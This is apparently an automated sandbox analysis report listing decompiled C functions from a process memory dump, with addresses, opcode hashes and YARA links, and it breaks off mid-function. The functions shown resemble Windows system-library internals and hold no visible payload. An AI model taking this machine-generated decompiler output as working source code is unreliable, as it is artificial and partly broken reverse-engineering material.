								E01066B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01066B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01066B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01007D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01029AE0();
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01002400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01002400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01002400( &_v52);
							}
							if(_v28 >= 0) {
								return L01002400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01066dd4
0x01066dde
0x01066de1
0x01066de3
0x01066de6
0x01066de9
0x01066dec
0x01066def
0x01066df2
0x01066df5
0x01066dfe
0x01066e04
0x01066e09
0x01066e0d
0x01066e18
0x01066e1b
0x01066e22
0x01066e2d
0x01066e30
0x01066e36
0x01066e42
0x01066e4d
0x01066e50
0x01066e55
0x01066e5c
0x01066e6e
0x01066e5e
0x01066e67
0x01066e67
0x01066e73
0x01066e74
0x01066e77
0x01066e7c
0x01066e7d
0x01066e8e
0x01066e93
0x01066e9c
0x01066ea8
0x01066eab
0x01066eac
0x01066eb3
0x01066ecd
0x01066edc
0x01066ee2
0x01066ee5
0x01066ef2
0x01066efb
0x01066f01
0x01066f06
0x01066f0b
0x01066f11
0x01066f1a
0x01066f22
0x01066f26
0x01066f26
0x01066f33
0x01066f41
0x01066f44
0x01066f47
0x01066f54
0x01066f65
0x01066f77
0x01066f7c
0x01066f82
0x01066f91
0x01066f99
0x01066fa3
0x01066fae
0x01066fae
0x01066fba
0x01066fbb
0x01066fbc
0x01066fc1
0x01066fc2
0x01066fd3
0x01066fd8
0x01066fd8
0x01066fdf
0x01066fe8
0x01066fee
0x01066fee
0x01066ff5
0x01066ffb
0x01066ffb
0x01067004
0x00000000
0x0106700a
0x01067004
0x01066eb3
0x01066e9c
0x01067015

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 7d4dab4bbff64a98d51aa9b0d907e67a8dd4c3c3adade51848820e6cda7f93a2
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 86717C71A0061AEFDB11DFA8C984AEEBBF9FF48714F104069E545E7290DB34AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0107B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0107B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x10d7b9c; // 0x0
				_t124 = L01004620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01029800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E010295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E010295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L010077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01029910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E010295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x10d7b9c; // 0x0
									_t92 = L01004620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01029910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E00FEA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0107E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0107E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E010295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0107b8d9
0x0107b8e4
0x00000000
0x0107b8e6
0x0107b8f3
0x0107b8f5
0x0107b8f5
0x0107b8f8
0x0107b920
0x0107b924
0x0107b936
0x0107b939
0x0107b93d
0x0107b948
0x0107b9a0
0x0107b9a0
0x0107b9a4
0x0107b9bf
0x0107b9c4
0x0107b9c6
0x0107b9cd
0x0107b9d1
0x0107bad4
0x0107bad8
0x0107bada
0x0107badc
0x0107badc
0x0107badf
0x0107bae0
0x0107bae2
0x0107bae4
0x0107baec
0x0107baee
0x0107baf0
0x0107baf0
0x0107baec
0x0107bafb
0x0107bafc
0x0107bafe
0x0107bb01
0x0107bb01
0x00000000
0x0107bb06
0x0107b9d7
0x0107b9db
0x0107b9db
0x0107b9de
0x0107b9de
0x0107b9e4
0x0107b9e7
0x0107b9ea
0x0107b9ec
0x0107b9ef
0x0107b9f3
0x0107ba1b
0x0107ba1b
0x0107ba23
0x0107ba24
0x0107ba27
0x0107ba2a
0x0107ba2b
0x0107ba2e
0x0107ba30
0x0107ba37
0x0107ba3f
0x0107ba9c
0x0107baa2
0x0107bb13
0x0107bb15
0x0107baae
0x0107baae
0x0107bab3
0x0107bab5
0x0107baba
0x0107bac8
0x0107bac8
0x0107baba
0x0107bacd
0x0107bacf
0x00000000
0x0107bacf
0x0107bb1a
0x00000000
0x0107bb1c
0x0107baa7
0x0107bb11
0x00000000
0x0107bb11
0x0107baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0107ba41
0x0107ba41
0x0107ba41
0x0107ba58
0x0107ba5d
0x0107ba62
0x00000000
0x00000000
0x0107ba64
0x0107ba67
0x0107ba68
0x0107ba69
0x0107ba6c
0x0107ba6f
0x0107ba71
0x0107ba78
0x0107ba80
0x00000000
0x00000000
0x0107ba90
0x0107ba90
0x0107ba97
0x00000000
0x0107ba97
0x0107b9f5
0x0107b9f7
0x0107b9f7
0x0107b9fa
0x0107ba03
0x0107ba07
0x0107ba0c
0x0107ba10
0x0107ba17
0x00000000
0x0107b9f7
0x0107b9a6
0x0107b9a8
0x0107b9af
0x0107b9b3
0x00000000
0x00000000
0x0107b9b9
0x00000000
0x0107b9b9
0x0107b94d
0x0107b98f
0x0107b995
0x0107b999
0x0107b960
0x0107b967
0x0107b968
0x0107b96a
0x00000000
0x0107b96a
0x0107b99b
0x0107b99e
0x00000000
0x00000000
0x00000000
0x0107b99e
0x0107b951
0x0107b954
0x0107b95a
0x0107b95e
0x0107b972
0x0107b979
0x0107b97d
0x0107b97f
0x0107b980
0x0107b982
0x0107b984
0x00000000
0x0107b984
0x00000000
0x0107b926
0x00000000
0x0107b926

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
Instruction ID: bd58453a90ab2cea533d9b3df92666b8f684408af7b5e5c2c4acf7a7e1c6c1c8
Opcode Fuzzy Hash: 9cbeeebc94c8073f57b1f1deb302ca1e4635101666575ebe8111091fd796559a
Instruction Fuzzy Hash: 4D710132A00702AFE732EF18CC44FAABBE5EF44724F144568E6D5876A0DBB5E940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00FE52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FE52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00FFEEF0(0x10d79a0);
					_t104 =  *0x10d8210; // 0xb82d40
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00FFEB70(_t93, 0x10d79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01029890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00FFEEF0(0x10d79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00FFEB70(0, 0x10d79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xb82d4d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0101F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00FFEEF0(0x10d79a0);
									__eflags =  *0x10d8210 - _t104; // 0xb82d40
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x10d8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01064888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00FFEB70(_t95, 0x10d79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010295D0();
											L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010295D0();
											L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00FFEB70(_t93, 0x10d79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E010295D0();
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E010295D0();
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0101F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x00fe52a5
0x00fe52ad
0x00fe52b0
0x00fe52b3
0x00fe52b7
0x00fe52ba
0x00fe52bf
0x00fe52c4
0x00fe52cc
0x00000000
0x00000000
0x00fe52ce
0x00fe52d9
0x00fe52dd
0x00fe52e7
0x00fe52f7
0x00fe52f9
0x00fe52fd
0x01040dcf
0x01040dd5
0x01040dd6
0x01040dd7
0x01040dd8
0x01040dd9
0x01040dde
0x01040ddf
0x01040de0
0x01040de1
0x01040de2
0x01040de5
0x01040dea
0x01040dec
0x01040f60
0x01040f64
0x01040f70
0x01040f76
0x01040f79
0x01040f79
0x00000000
0x01040f64
0x01040df2
0x01040df7
0x01040e04
0x01040e0d
0x01040e0d
0x01040e10
0x01040e1a
0x01040e1c
0x01040e4c
0x01040e52
0x01040e61
0x01040e67
0x01040e6b
0x01040e70
0x01040e76
0x01040ed7
0x01040edc
0x01040ee0
0x01040ee6
0x01040eea
0x01040eed
0x01040ef0
0x01040ef3
0x01040ef6
0x01040ef9
0x01040efe
0x01040f01
0x01040f01
0x01040f0b
0x01040f12
0x01040f16
0x01040f18
0x01040f1b
0x01040f2c
0x01040f31
0x01040f31
0x01040f35
0x01040f39
0x01040f3a
0x01040f3c
0x01040f3f
0x01040f50
0x01040f55
0x01040f55
0x01040f59
0x00fe52eb
0x00fe52f1
0x00fe52f1
0x01040e7d
0x01040e84
0x01040e88
0x01040e8a
0x01040e8d
0x01040e9e
0x01040ea3
0x01040ea3
0x01040ea7
0x01040eaf
0x01040eb3
0x01040eb9
0x01040eb9
0x01040ebc
0x01040ecd
0x01040ecd
0x00000000
0x01040eb3
0x01040e21
0x01040e2b
0x01040e2f
0x01040e30
0x01040e3a
0x01040e3f
0x01040e41
0x00000000
0x00000000
0x01040e47
0x00000000
0x01040e47
0x01040df9
0x01040dfe
0x00000000
0x00000000
0x00000000
0x01040dfe
0x00fe5303
0x00fe5307
0x00000000
0x00fe5309
0x00000000
0x00fe5309
0x00fe5307
0x00fe52e9
0x00fe52e9
0x00000000
0x00fe52e9
0x00fe530e
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
Instruction ID: 31c2e80bd2175854b6f4eb26d31e4dfb3707a9291b089906fecd16ec9f94e5a9
Opcode Fuzzy Hash: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
Instruction Fuzzy Hash: CF51FC71205792ABD322EF29C841B67BBE4FF50B14F10082EF6C597662E774E804DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01012AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01012AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x10d8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x10d8208; // 0x10d8207
				_t8 = _t57 + 0x10d8208; // 0x10d8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x10d8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x10d821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x10d6d5c; // 0x7f8b0654
							_t72 =  *0x10d6d5c; // 0x7f8b0654
							_t75 =  *0x10d6d5c; // 0x7f8b0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x10d6d5c; // 0x7f8b0654
							_t84 =  *0x10d6d5c; // 0x7f8b0654
							_t87 =  *0x10d6d5c; // 0x7f8b0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0102F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01012ae4
0x01012aec
0x01012aef
0x01012af4
0x01012af7
0x01012afd
0x01012b92
0x01012b92
0x01012b97
0x01012b9c
0x01012b9c
0x01012b03
0x01012b06
0x01012b09
0x01012b09
0x01012b0f
0x01012b15
0x01012b15
0x01012b1b
0x01012b1e
0x01012b21
0x01012b26
0x01012b29
0x01012b81
0x01012b84
0x01012c0e
0x01012c15
0x01012c24
0x01012c24
0x01012b8a
0x01012b8a
0x01012b8a
0x01012b8a
0x01012b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01012b4a
0x01012b4a
0x01012b4d
0x01012b53
0x00000000
0x00000000
0x01012b55
0x01012b58
0x01012bb7
0x01055d1b
0x01055d37
0x01055d47
0x01055d53
0x01012bbd
0x01012bbd
0x01012bbd
0x01012bb7
0x01012b5d
0x01012c2f
0x01055d5b
0x01055d77
0x01055d87
0x01055d93
0x01012c35
0x01012c35
0x01012c35
0x01012c2f
0x01012b65
0x01012b9f
0x01012ba2
0x01012b67
0x01012b67
0x01012b69
0x01012b6b
0x01012b6e
0x01012bc9
0x01012bcc
0x01012bcf
0x01012bd4
0x01012bd6
0x01012bd6
0x01012bdb
0x01012c02
0x01012c05
0x01012c07
0x00000000
0x01012c07
0x01012be0
0x01012c00
0x01012c3f
0x01012c3f
0x00000000
0x01012c00
0x01012be5
0x01012be7
0x01012bec
0x01012bf4
0x01012bf6
0x00000000
0x01012bf6
0x01012b70
0x01012b76
0x01012b2b
0x01012b2b
0x01012b2d
0x01012b2f
0x01012b32
0x01012b35
0x01012b3a
0x00000000
0x01012b40
0x01012b43
0x01012b45
0x01012b47
0x01012b4a
0x01012b4d
0x01012b53
0x00000000
0x00000000
0x00000000
0x01012b53
0x01012b78
0x01012b78
0x01012b7b
0x01012b7e
0x00000000
0x01012b7e
0x01012b76
0x01012ba5
0x01012ba5
0x01012ba8
0x01012bad
0x00000000
0x00000000
0x01012baf
0x01012baf
0x01012bc2
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
Instruction ID: ce2f959345b10d6cae98992690af84014f318e19235f786b2fd214a3ad5a74ff
Opcode Fuzzy Hash: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
Instruction Fuzzy Hash: A851A176A00125CFCB18DF1CC8909BDB7F1FB88700725845AE9C6DB369D739AA91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0100DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E00FECC50(E00FE4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01007D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E010B8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01002280(_t58, _v44);
						E0100DD82(_v44, _t102, _t98);
						E0100B944(_t102, _v5);
						return E00FFFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x10d8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x10d862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
